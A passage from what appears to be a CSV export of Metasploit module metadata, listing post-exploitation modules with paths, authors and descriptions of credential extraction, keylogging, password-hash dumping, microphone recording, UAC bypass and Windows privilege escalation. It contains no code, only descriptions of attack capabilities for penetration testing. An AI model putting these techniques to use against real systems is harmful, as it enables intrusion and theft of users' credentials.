line","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1850,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/multi_post.rb","post","multi/manage/multi_post","post/multi/manage/multi_post","Multi Manage Post Module Macro Execution",300,"This module will execute a list of modules given in a macro file in the format of against the select session checking for compatibility of the module against the sessions and validation of the options provided.","Metasploit Framework License (BSD)","f",,,,,"t",,"carlos_perez " 1851,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/record_mic.rb","post","multi/manage/record_mic","post/multi/manage/record_mic","Multi Manage Record Microphone",300,"This module will enable and record your target's microphone. For non-Windows targets, please use Java meterpreter to be able to use this feature.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1852,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/sudo.rb","post","multi/manage/sudo","post/multi/manage/sudo","Multiple Linux / Unix Post Sudo Upgrade Shell",300,"This module attempts to upgrade a shell account to UID 0 by reusing the given password and passing it to sudo. This technique relies on sudo versions from 2008 and later which support -A.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.sudo.ws/repos/sudo/file/05780f5f71fd/sudo.h","Ryan Baxendale , todb " 1853,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/multi/manage/system_session.rb","post","multi/manage/system_session","post/multi/manage/system_session","Multi Manage System Remote TCP Shell Session",300,"This module will create a Reverse TCP Shell on the target system using the system own scripting enviroments installed on the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1854,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/admin/say.rb","post","osx/admin/say","post/osx/admin/say","OS X Text to Speech Utility",300,"This module will speak whatever is in the 'TEXT' option on the victim machine.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.gabrielserafini.com/blog/2008/08/19/mac-os-x-voices-for-using-with-the-say-command/","sinn3r " 1855,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_adium.rb","post","osx/gather/enum_adium","post/osx/gather/enum_adium","OS X Gather Adium Enumeration",300,"This module will collect Adium's account plist files and chat logs from the victim's machine. There are three different actions you may choose: ACCOUNTS, CHATS, and ALL. Note that to use the 'CHATS' action, make sure you set the regex 'PATTERN' option in order to look for certain log names (which consists of a contact's name, and a timestamp). The current 'PATTERN' option is configured to look for any log created on February 2012 as an example. To loot both account plists and chat logs, simply set the action to 'ALL'.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1856,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_airport.rb","post","osx/gather/enum_airport","post/osx/gather/enum_airport","OS X Gather Airport Wireless Preferences",300,"This module will download OS X Airport Wireless preferences from the victim machine. The preferences file (which is a plist) contains information such as: SSID, Channels, Security Type, Password ID, etc.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1857,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_chicken_vnc_profile.rb","post","osx/gather/enum_chicken_vnc_profile","post/osx/gather/enum_chicken_vnc_profile","OS X Gather Chicken of the VNC Profile",300,"This module will download the ""Chicken of the VNC"" client application's profile file, which is used to store other VNC servers' information such as as the IP and password.","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1858,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_colloquy.rb","post","osx/gather/enum_colloquy","post/osx/gather/enum_colloquy","OS X Gather Colloquy Enumeration",300,"This module will collect Colloquy's info plist file and chat logs from the victim's machine. There are three actions you may choose: INFO, CHATS, and ALL. Please note that the CHAT action may take a long time depending on the victim machine, therefore we suggest to set the regex 'PATTERN' option in order to search for certain log names (which consists of the contact's name, and a timestamp). The default 'PATTERN' is configured as ""^alien"" as an example to search for any chat logs associated with the name ""alien"".","Metasploit Framework License (BSD)","f",,,,,"t",,"sinn3r " 1859,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_keychain.rb","post","osx/gather/enum_keychain","post/osx/gather/enum_keychain","OS X Gather Keychain Enumeration",300,"This module presents a way to quickly go through the current user's keychains and collect data such as email accounts, servers, and other services. Please note: when using the GETPASS option, the user will have to manually enter the password, and then click 'allow' in order to collect each password.","Metasploit Framework License (BSD)","f",,,,,"t",,"ipwnstuff " 1860,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/enum_osx.rb","post","osx/gather/enum_osx","post/osx/gather/enum_osx","OS X Gather Mac OS X System Information Enumeration",300,"This module gathers basic system information from Mac OS X Tiger, Leopard, Snow Leopard and Lion systems.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1861,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/osx/gather/hashdump.rb","post","osx/gather/hashdump","post/osx/gather/hashdump","OS X Gather Mac OS X Password Hash Collector",300,"This module dumps SHA-1, LM and NT Hashes of Mac OS X Tiger, Leopard, Snow Leopard and Lion Systems.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez , hammackj " 1862,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/cisco/gather/ios_info.rb","post","pro/cisco/gather/ios_info","post/pro/cisco/gather/ios_info","Cisco IOS Gather Configuration",300,"This module will attempt to gather device information from a session on a Cisco IOS device.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1863,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/device/gather/device_info.rb","post","pro/device/gather/device_info","post/pro/device/gather/device_info","Unknown Device Gather Info",300,"This module will attempt to get information about unknown devices.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1864,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/agent.rb","post","pro/multi/agent","post/pro/multi/agent","Metasploit Pro Persistent Agent",300,"Install a persistent agent (in-memory or on-disk) with a maximum execution time","Rapid7 Proprietary","f",,,,,"t",,"hdm " 1865,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/agent_cleaner.rb","post","pro/multi/agent_cleaner","post/pro/multi/agent_cleaner","Metasploit Pro Persistent Agent Cleaner",300,"Remove a persistent agent installed by the Agent module","Rapid7 Proprietary","f",,,,,"t",,"hdm " 1866,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/gather/hashdump.rb","post","pro/multi/gather/hashdump","post/pro/multi/gather/hashdump","Pro: Multi Gather Hashdump",300,"This module will attempt to gather passwd and shadow files from the target. If it is able to retrieve both, it will attempt to unshadow them as well for future cracking.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1867,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/gather/sysinfo.rb","post","pro/multi/gather/sysinfo","post/pro/multi/gather/sysinfo","Unix Gather System Info",300,"This module will gather system information about the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1868,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/multi/macro.rb","post","pro/multi/macro","post/pro/multi/macro","Metasploit Pro Post Exploitation Macro Launcher",300,"Execute a macro that was defined in the Metasploit Pro user interface.","Rapid7 Proprietary","f",,,,,"t",,"hdm " 1869,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/escalate/getsystem.rb","post","pro/windows/escalate/getsystem","post/pro/windows/escalate/getsystem","Windows Escalate GetSystem",300,"This module will attempt to escalate priviliges using the getsystem command.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1870,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/files.rb","post","pro/windows/gather/files","post/pro/windows/gather/files","Windows Gather Network Info",300,"This module will gather files matching the supplied pattern.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1871,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/net_info.rb","post","pro/windows/gather/net_info","post/pro/windows/gather/net_info","Windows Gather Network Info",300,"This module will gather network configuration information about the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"thelightcosine" 1872,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/process_list.rb","post","pro/windows/gather/process_list","post/pro/windows/gather/process_list","Windows Gather Process List",300,"This module will gather the list of running processes on the target.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1873,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/screenshot.rb","post","pro/windows/gather/screenshot","post/pro/windows/gather/screenshot","Windows Capture Desktop Screenshot",300,"This module will take a snapshot of the interactive desktop. If a screeensaver is running, it will be stopped prior to the screenshot being taken.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1874,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/sysinfo.rb","post","pro/windows/gather/sysinfo","post/pro/windows/gather/sysinfo","Windows Gather System Info",300,"This module will gather system information about the Windows Session.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1875,"2013-05-30 16:15:32","/opt/metasploit/apps/pro/modules/post/pro/windows/gather/wininfo_shell.rb","post","pro/windows/gather/wininfo_shell","post/pro/windows/gather/wininfo_shell","Windows Gather System Info (Shell)",300,"This module will gather system information about the Windows Session. This module is for shell sessions instead of meterpreter.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , thelightcosine" 1876,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/checkvm.rb","post","solaris/gather/checkvm","post/solaris/gather/checkvm","Solaris Gather Virtual Environment Detection",300,"This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detectoin of Solaris Zone, VMWare, VirtualBox, Xen, and QEMU/KVM.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1877,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/enum_packages.rb","post","solaris/gather/enum_packages","post/solaris/gather/enum_packages","Solaris Gather Installed Packages",300,"Post Module to enumerate installed packages on a Solaris System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1878,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/enum_services.rb","post","solaris/gather/enum_services","post/solaris/gather/enum_services","Solaris Gather Configured Services",300,"Post Module to enumerate services on a Solaris System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1879,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/solaris/gather/hashdump.rb","post","solaris/gather/hashdump","post/solaris/gather/hashdump","Solaris Gather Dump Password Hashes for Solaris Systems",300,"Post Module to dump the password hashes for all users on a Solaris System","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1880,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/capture/keylog_recorder.rb","post","windows/capture/keylog_recorder","post/windows/capture/keylog_recorder","Windows Capture Keystroke Recorder",300,"This module can be used to capture keystrokes. To capture keystrokes when the session is running as SYSTEM, the MIGRATE option must be enabled and the CAPTURE_TYPE option should be set to one of Explorer, Winlogon, or a specific PID. To capture the keystrokes of the interactive user, the Explorer option should be used with MIGRATE enabled. Keep in mind that this will demote this session to the user's privileges, so it makes sense to create a separate session for this task. The Winlogon option will capture the username and password entered into the logon and unlock dialog. The LOCKSCREEN option can be combined with the Winlogon CAPTURE_TYPE to for the user to enter their clear-text password.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1881,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/capture/lockout_keylogger.rb","post","windows/capture/lockout_keylogger","post/windows/capture/lockout_keylogger","Winlogon Lockout Credential Keylogger",300,"This module migrates and logs Microsoft Windows user's passwords via Winlogon.exe. Using idle time and natural system changes to give a false sense of security to the user.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://blog.metasploit.com/2010/12/capturing-windows-logons-with.html","cg, mubix " 1882,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/bypassuac.rb","post","windows/escalate/bypassuac","post/windows/escalate/bypassuac","Windows Escalate UAC Protection Bypass",300,"This module will bypass Windows UAC by utilizing the trusted publisher certificate through process injection. It will spawn a second shell that has the UAC flag turned off.","Metasploit Framework License (BSD)","f","2010-12-31 00:00:00",,,,"t","URL-http://www.trustedsec.com/december-2010/bypass-windows-uac/","David Kennedy ""ReL1K"" , mitnick" 1883,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/droplnk.rb","post","windows/escalate/droplnk","post/windows/escalate/droplnk","Windows Escalate SMB Icon LNK Dropper",300,"This module drops a shortcut (LNK file) that has a ICON reference existing on the specified remote host, causing SMB and WebDAV connections to be initiated from any user that views the shortcut.","Metasploit Framework License (BSD)","f",,,,,"t",,"mubix " 1884,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/getsystem.rb","post","windows/escalate/getsystem","post/windows/escalate/getsystem","Windows Escalate Get System via Administrator",300,"This module uses the builtin 'getsystem' command to escalate the current session to the SYSTEM account from an administrator user account.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm " 1885,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/ms10_073_kbdlayout.rb","post","windows/escalate/ms10_073_kbdlayout","post/windows/escalate/ms10_073_kbdlayout","Windows Escalate NtUserLoadKeyboardLayoutEx Privilege Escalation",300,"This module exploits the keyboard layout vulnerability exploited by Stuxnet. When processing specially crafted keyboard layout files (DLLs), the Windows kernel fails to validate that an array index is within the bounds of the array. By loading a specially crafted keyboard layout, an attacker can execute code in Ring 0.","Metasploit Framework License (BSD)","f","2010-10-12 00:00:00",,,,"t","CVE-2010-2743, EDB-15985, MSB-MS10-073, OSVDB-68552, URL-http://www.reversemode.com/index.php?option=com_content&task=view&id=71&Itemid=1, URL-http://www.vupen.com/blog/20101018.Stuxnet_Win32k_Windows_Kernel_0Day_Exploit_CVE-2010-2743.php","Ruben Santamarta, jduck " 1886,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/ms10_092_schelevator.rb","post","windows/escalate/ms10_092_schelevator","post/windows/escalate/ms10_092_schelevator","Windows Escalate Task Scheduler XML Privilege Escalation",300,"This module exploits the Task Scheduler 2.0 XML 0day exploited by Stuxnet. When processing task files, the Windows Task Scheduler only uses a CRC32 checksum to validate that the file has not been tampered with. Also, In a default configuration, normal users can read and write the task files that they have created. By modifying the task file and creating a CRC32 collision, an attacker can execute arbitrary commands with SYSTEM privileges. NOTE: Thanks to webDEViL for the information about disable/enable.","Metasploit Framework License (BSD)","f","2010-09-13 00:00:00",,,,"t","BID-44357, CVE-2010-3338, EDB-15589, MSB-MS10-092, OSVDB-68518","jduck " 1887,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/net_runtime_modify.rb","post","windows/escalate/net_runtime_modify","post/windows/escalate/net_runtime_modify","Windows Escalate Microsoft .NET Runtime Optimization Service Privilege Escalation",300,"This module attempts to exploit the security permissions set on the .NET Runtime Optimization service. Vulnerable versions of the .NET Framework include 4.0 and 2.0. The permissions on this service allow domain users and local power users to modify the mscorsvw.exe binary.","Metasploit Framework License (BSD)","f",,,,,"t","EDB-16940, OSVDB-71013","bannedit " 1888,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/screen_unlock.rb","post","windows/escalate/screen_unlock","post/windows/escalate/screen_unlock","Windows Escalate Locked Desktop Unlocker",300,"This module unlocks a locked Windows desktop by patching the respective code inside the LSASS.exe process. This patching process can result in the target system hanging or even rebooting, so be careful when using this module on production systems.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.storm.net.nz/projects/16","L4teral , Metlstorm" 1889,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/escalate/service_permissions.rb","post","windows/escalate/service_permissions","post/windows/escalate/service_permissions","Windows Escalate Service Permissions Local Privilege Escalation",300,"This module attempts to exploit existing administrative privileges to obtain a SYSTEM session. If directly creating a service fails, this module will inspect existing services to look for insecure file or configuration permissions that may be hijacked. It will then attempt to restart the replaced service to run the payload. This will result in a new session when this succeeds. If the module is able to modify the service but does not have permission to start and stop the affected service, the attacker must wait for the system to restart before a session will be created.","Metasploit Framework License (BSD)","f",,,,,"t",,"scriptjunkie" 1890,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/arp_scanner.rb","post","windows/gather/arp_scanner","post/windows/gather/arp_scanner","Windows Gather ARP Scanner",300,"This Module will perform an ARP scan for a given IP range through a Meterpreter Session.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1891,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/bitcoin_jacker.rb","post","windows/gather/bitcoin_jacker","post/windows/gather/bitcoin_jacker","Windows Gather Bitcoin wallet.dat",300,"This module downloads any Bitcoin wallet.dat files from the target system","Metasploit Framework License (BSD)","f",,,,,"t",,"illwill " 1892,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/cachedump.rb","post","windows/gather/cachedump","post/windows/gather/cachedump","Windows Gather Credential Cache Dump",300,"This module uses the registry to extract the stored domain hashes that have been cached as a result of a GPO setting. The default setting on Windows is to store the last ten successful logins.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://lab.mediaservice.net/code/cachedump.rb","Maurizio Agazzini , mubix " 1893,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/checkvm.rb","post","windows/gather/checkvm","post/windows/gather/checkvm","Windows Gather Virtual Environment Detection",300,"This module attempts to determine whether the system is running inside of a virtual environment and if so, which one. This module supports detectoin of Hyper-V, VMWare, Virtual PC, VirtualBox, Xen, and QEMU.","Metasploit Framework License (BSD)","f",,,,,"t",,"Carlos Perez " 1894,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/bulletproof_ftp.rb","post","windows/gather/credentials/bulletproof_ftp","post/windows/gather/credentials/bulletproof_ftp","Windows Gather BulletProof FTP Client Saved Password Extraction",300,"This module extracts information from BulletProof FTP Bookmarks files and store retrieved credentials in the database.","Metasploit Framework License (BSD)","f",,,,,"t",,"juan vazquez " 1895,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/coreftp.rb","post","windows/gather/credentials/coreftp","post/windows/gather/credentials/coreftp","Windows Gather CoreFTP Saved Password Extraction",300,"This module extracts saved passwords from the CoreFTP FTP client. These passwords are stored in the registry. They are encrypted with AES-128-ECB. This module extracts and decrypts these passwords.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1896,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/credential_collector.rb","post","windows/gather/credentials/credential_collector","post/windows/gather/credentials/credential_collector","Windows Gather Credential Collector",300,"This module harvests credentials found on the host and stores them in the database.","Metasploit Framework License (BSD)","f",,,,,"t",,"tebo " 1897,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/dyndns.rb","post","windows/gather/credentials/dyndns","post/windows/gather/credentials/dyndns","Windows Gather Dyn-Dns Client Password Extractor",300,"This module extracts the username, password, and hosts for Dyn-Dns version 4.1.8. This is done by downloading the config.dyndns file from the victim machine, and then automatically decode the password field. The original copy of the config file is also saved to disk.","Metasploit Framework License (BSD)","f",,,,,"t",,"Shubham Dawra , sinn3r " 1898,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/enum_cred_store.rb","post","windows/gather/credentials/enum_cred_store","post/windows/gather/credentials/enum_cred_store","Windows Gather Credential Store Enumeration and Decryption Module",300,"This module will enumerate the Microsoft Credential Store and decrypt the credentials. This module can only access credentials created by the user the process is running as. It cannot decrypt Domain Network Passwords, but will display the username and location.","Metasploit Framework License (BSD)","f",,,,,"t",,"Kx499" 1899,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/enum_picasa_pwds.rb","post","windows/gather/credentials/enum_picasa_pwds","post/windows/gather/credentials/enum_picasa_pwds","Windows Gather Google Picasa Password Extractor",300,"This module extracts and decrypts the login passwords stored by Google Picasa.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team, Sil3ntDre4m " 1900,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/epo_sql.rb","post","windows/gather/credentials/epo_sql","post/windows/gather/credentials/epo_sql","Windows Gather McAfee ePO 4.6 Config SQL Credentials",300,"This module extracts connection details and decrypts the saved password for the SQL database in use by a McAfee ePO 4.6 server. The passwords are stored in a config file. They are encrypted with AES-128-ECB and a static key.","Metasploit Framework License (BSD)","f",,,,,"t",,"Nathan Einwechter " 1901,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/filezilla_server.rb","post","windows/gather/credentials/filezilla_server","post/windows/gather/credentials/filezilla_server","Windows Gather FileZilla FTP Server Credential Collection",300,"This module will collect credentials from the FileZilla FTP server if installed.","Metasploit Framework License (BSD)","f",,,,,"t",,"bannedit " 1902,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/flashfxp.rb","post","windows/gather/credentials/flashfxp","post/windows/gather/credentials/flashfxp","Windows Gather FlashFXP Saved Password Extraction",300,"This module extracts weakly encrypted saved FTP Passwords from FlashFXP. It finds saved FTP connections in the Sites.dat file.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1903,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/ftpnavigator.rb","post","windows/gather/credentials/ftpnavigator","post/windows/gather/credentials/ftpnavigator","Windows Gather FTP Navigator Saved Password Extraction",300,"This module extracts saved passwords from the FTP Navigator FTP client. It will decode the saved passwords and store them in the database.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1904,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/ftpx.rb","post","windows/gather/credentials/ftpx","post/windows/gather/credentials/ftpx","Windows Gather FTP Explorer (FTPX) Credential Extraction",300,"This module finds saved login credentials for the FTP Explorer (FTPx) FTP client for Windows.","Metasploit Framework License (BSD)","f",,,,,"t",,"Brendan Coles " 1905,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/gpp.rb","post","windows/gather/credentials/gpp","post/windows/gather/credentials/gpp","Windows Gather Group Policy Preference Saved Passwords",300,"This module enumerates the victim machine's domain controller and connects to it via SMB. It then looks for Group Policy Preference XML files containing local user accounts and passwords and decrypts them using Microsofts public AES key. Tested on WinXP SP3 Client and Win2k8 R2 DC.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://blogs.technet.com/grouppolicy/archive/2009/04/22/passwords-in-group-policy-preferences-updated.aspx, URL-http://esec-pentest.sogeti.com/exploiting-windows-2008-group-policy-preferences, URL-http://msdn.microsoft.com/en-us/library/cc232604(v=prot.13), URL-http://rewtdance.blogspot.com/2012/06/exploiting-windows-2008-group-policy.html","Ben Campbell , Loic Jaquemet , mubix , scriptmonkey , theLightCosine " 1906,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/idm.rb","post","windows/gather/credentials/idm","post/windows/gather/credentials/idm","Windows Gather Internet Download Manager (IDM) Password Extractor",300,"This module recovers the saved premium download account passwords from Internet Download Manager (IDM). These passwords are stored in an encoded format in the registry. This module traverses through these registry entries and decodes them. Thanks to the template code of theLightCosine's CoreFTP password module.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team , sil3ntdre4m " 1907,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/imail.rb","post","windows/gather/credentials/imail","post/windows/gather/credentials/imail","Windows Gather IPSwitch iMail User Data Enumeration",300,"This module will collect iMail user data such as the username, domain, full name, e-mail, and the decoded password. Please note if IMAILUSER is specified, the module extracts user data from all the domains found. If IMAILDOMAIN is specified, then it will extract all user data under that particular category.","Metasploit Framework License (BSD)","f",,,,,"t","EDB-11331","sinn3r " 1908,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/imvu.rb","post","windows/gather/credentials/imvu","post/windows/gather/credentials/imvu","Windows Gather Credentials IMVU Game Client",300,"This module extracts account username & password from the IMVU game client and stores it as loot.","Metasploit Framework License (BSD)","f",,,,,"t",,"Shubham Dawra " 1909,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/meebo.rb","post","windows/gather/credentials/meebo","post/windows/gather/credentials/meebo","Windows Gather Meebo Password Extractor",300,"This module extracts login account password stored by Meebo Notifier, a desktop version of Meebo's Online Messenger.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team , Sil3ntDre4m " 1910,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/mremote.rb","post","windows/gather/credentials/mremote","post/windows/gather/credentials/mremote","Windows Gather mRemote Saved Password Extraction",300,"This module extracts saved passwords from mRemote. mRemote stores connections for RDP, VNC, SSH, Telnet, rlogin and other protocols. It saves the passwords in an encrypted format. The module will extract the connection info and decrypt the saved passwords.","Metasploit Framework License (BSD)","f",,,,,"t",,"hdm , mubix , theLightCosine " 1911,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/nimbuzz.rb","post","windows/gather/credentials/nimbuzz","post/windows/gather/credentials/nimbuzz","Windows Gather Nimbuzz Instant Messenger Password Extractor",300,"This module extracts the account passwords saved by Nimbuzz Instant Messenger in hex format.","Metasploit Framework License (BSD)","f",,,,,"t",,"SecurityXploded Team, sil3ntdre4m " 1912,"2013-05-23 08:20:18","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/outlook.rb","post","windows/gather/credentials/outlook","post/windows/gather/credentials/outlook","Windows Gather Microsoft Outlook Saved Password Extraction",300,"This module extracts and decrypts saved Microsoft Outlook (versions 2002-2010) passwords from the Windows Registry for POP3/IMAP/SMTP/HTTP accounts. In order for decryption to be successful, this module must be executed under the same privileges as the user which originally encrypted the password.","Metasploit Framework License (BSD)","f",,,,,"t",,"Justin Cacak" 1913,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/razer_synapse.rb","post","windows/gather/credentials/razer_synapse","post/windows/gather/credentials/razer_synapse","Razer Synapse Password Extraction",300,"This module will enumerate passwords stored by the Razer Synapse client. The encryption key and iv is publicly known. This module will not only extract encrypted password but will also decrypt password using public key. Affects versions earlier than 1.7.15.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://www.pentestgeek.com/2013/01/16/hard-coded-encryption-keys-and-more-wordpress-fun/, URL-https://github.com/pasv/Testing/blob/master/Razer_decode.py","Brandon McCann ""zeknox"" , Matt Howard ""pasv"" , Thomas McCarthy ""smilingraccoon"" " 1914,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/razorsql.rb","post","windows/gather/credentials/razorsql","post/windows/gather/credentials/razorsql","Windows Gather RazorSQL Credentials",300,"This module stores username, password, type, host, port, database (and name) collected from profiles.txt of RazorSQL.","Metasploit Framework License (BSD)","f",,,,,"t",,"Paul Rascagneres , sinn3r " 1915,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/smartftp.rb","post","windows/gather/credentials/smartftp","post/windows/gather/credentials/smartftp","Windows Gather SmartFTP Saved Password Extraction",300,"This module finds saved login credentials for the SmartFTP FTP client for windows. It finds the saved passwords and decrypts them.","Metasploit Framework License (BSD)","f",,,,,"t",,"theLightCosine " 1916,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/spark_im.rb","post","windows/gather/credentials/spark_im","post/windows/gather/credentials/spark_im","Windows Gather Spark IM Password Extraction",300,"This module will enumerate passwords stored by the Spark IM client. The encryption key is publicly known. This module will not only extract encrypted password but will also decrypt password using public key.","Metasploit Framework License (BSD)","f",,,,,"t","URL-http://adamcaudill.com/2012/07/27/decrypting-spark-saved-passwords/","Brandon McCann ""zeknox"" , Thomas McCarthy ""smilingraccoon"" " 1917,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/steam.rb","post","windows/gather/credentials/steam","post/windows/gather/credentials/steam","Steam Client Session Collector.",300,"This module will collect Steam session information from an account set to autologin.","Metasploit Framework License (BSD)","f",,,,,"t",,"Nikolai Rusakov " 1918,"2013-05-07 00:25:41","/opt/metasploit/apps/pro/msf3/modules/post/windows/gather/credentials/tortoisesvn.rb","post","windows/gather/credentials/tortoisesvn","post/windows/gather/credentials/tortoisesvn","Windows Gather TortoiseSVN Saved Password Extraction",300,"This module extracts and decrypts saved TortoiseSVN passwords. In order for decryption to be successful this module must be executed under the same privileges as the user which originally encrypted the password.","Metasploit Framework License (BSD)","f",,,,,"t",,"Justin Cacak" 1919,"2013-05-07 